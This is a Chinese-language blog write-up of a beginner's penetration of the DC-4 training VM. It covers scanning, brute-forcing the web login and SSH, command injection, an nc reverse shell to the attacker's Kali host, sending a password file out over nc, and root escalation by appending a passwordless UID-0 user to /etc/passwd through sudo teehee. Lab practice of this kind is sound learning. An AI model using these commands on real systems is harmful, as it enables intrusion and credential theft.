新手的第一次DC-4靶场渗透实战过程

新手的第一次DC-4靶场渗透实战过程

一.信息收集

1. 靶机探测

nmap -sn 192.168.162.1/24 --exclude 192.168.162.128 192.168.162.1

扫描网段内存活的主机 不扫描端口

image-20250224173238078

我们将192.168.162.143都mac地址比对 确定这是我们的dc-3的ip地址

2.端口扫描

nmap -sV -sC -O -p- 192.168.162.143

-sV是版本探测,用于确定服务版本。

-sC是使用默认脚本扫描,可能涉及漏洞检测或服务识别。

-O是操作系统检测

-p-指定扫描所有端口(1-65535)

image-20250224173454808

在目标主机上面开启了80和22端口已经http和ssh服务

3.目录扫描

image-20250224175302916

没有什么有用的信息

4.网站信息

访问靶机的IP地址

image-20250224174102275

空空如也....

二.漏洞利用

1.暴力破解

image-20250224175513237

nginx没有默认账户密码的 这里只能猜测 用户的账户是admin

对这个网站登录进行抓包 启动我们的burpsuite

不会使用的可以参考这个:BurpSuite全套使用教程(超实用超详细介绍

设置代理 开启浏览器代理 登录抓包

image-20250224180431355将我们的url发送到爆破模块 添加好变量 载入我们的字典 进行爆破

爆破出来得到了密码 happy 我们去网页进行登录

我们成功登录后有个 Command点击

image-20250224192229732

点击 List Files -> Run的时候我们看到了显示了ls-l已经当前目录下有什么文件

image-20250224192447001

2.任意命令执行

我们用burpsuite对刚刚的请求进行抓包 将数据包发送到Repeater模块中 修改里面的参数

image-20250224192928498

3.反弹shell

我们这里使用nc 将radio后面的数据进行修改 反弹shell 使得目标靶机执行nc命令

点击Decoder 先对nc的f反弹命令进行url编码

nc 192.168.162.128 -e /bin/bash

%6e%63%20%31%39%32%2e%31%36%38%2e%31%36%32%2e%31%32%38%20%34%34%34%35%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68

image-20250224202605210

打开kali新建终端 使用nc命令监听端口

nc -lvp 4444

image-20250224202351572

将url编码后的nc命令填入到radio后的参数中 再进行发送

image-20250224203339748

可以看到反弹成功

image-20250224203449669

将shell升级成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20250224203554672

4.提权

我们这边进入/home目录下

image-20250224210011998

可以看到有三个用户 只有jim可以查看里面的内容

image-20250224210223453

在backups下有一堆有存着一些老的密码

image-20250224210342504

使用nc 将密码反弹到我们的kali上 在kali启动监听端口

image-20250224211046701

然后再在目标靶机上面将文件反弹到kali上

image-20250224211125772

image-20250224211209695

使用hydra对ssh服务进行爆破

hydra 192.168.162.143 ssh -l jim -P /root/old-password.bak -t 16 -Vv -f

image-20250224211558643

得到了我们的密码 jibril04 对ssh服务进行登录

image-20250224211748198

查看我们刚刚没有办法看到的mbox文件

image-20250224211836154

这是来自一封root的邮件 我们去邮箱找一下/var/spool/mail

image-20250224212233349

额.....这里直接将账号密码告诉我了

账户 :charles

密码:^xHhA&hvim0y

直接使用ssh进行登录

image-20250224212516646

 1. **权限配置解析**
- **`(root) NOPASSWD: /usr/bin/teehee`**  
  这表示用户`charles`可以**无需输入密码**(`NOPASSWD`)以`root`身份运行`/usr/bin/teehee`命令。这是通过`sudoers`文件配置的提权路径[[1]][[3]][[5]]。
2. **`teehee`命令的作用**
- **功能描述**  
  `teehee`是一个类似`tee`的工具,可将标准输入内容**追加到文件**(通过`-a`参数)并输出到标准输出。例如:  
​```bash
  echo "test" | sudo teehee -a /tmp/file  # 以root权限向文件追加内容

修改/etc/passwd文件

通过注入一个UID为0的用户(等同于root),实现提权:

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd (如果输入命令后显示要输入passwd 把靶机重启一下就好了)

image-20250224214029056

三.查找flag

使用命令 find / -name flag 对flag进行查找

image-20250224214240100

完成找到flag了

image-20250224214349604

总结

1.当没有找到默认账户和密码的时候使用 常用用户名配合密码字典进行爆破

posted @ 2025-08-06 11:52  0xMouise  阅读(4)  评论(0)    收藏  举报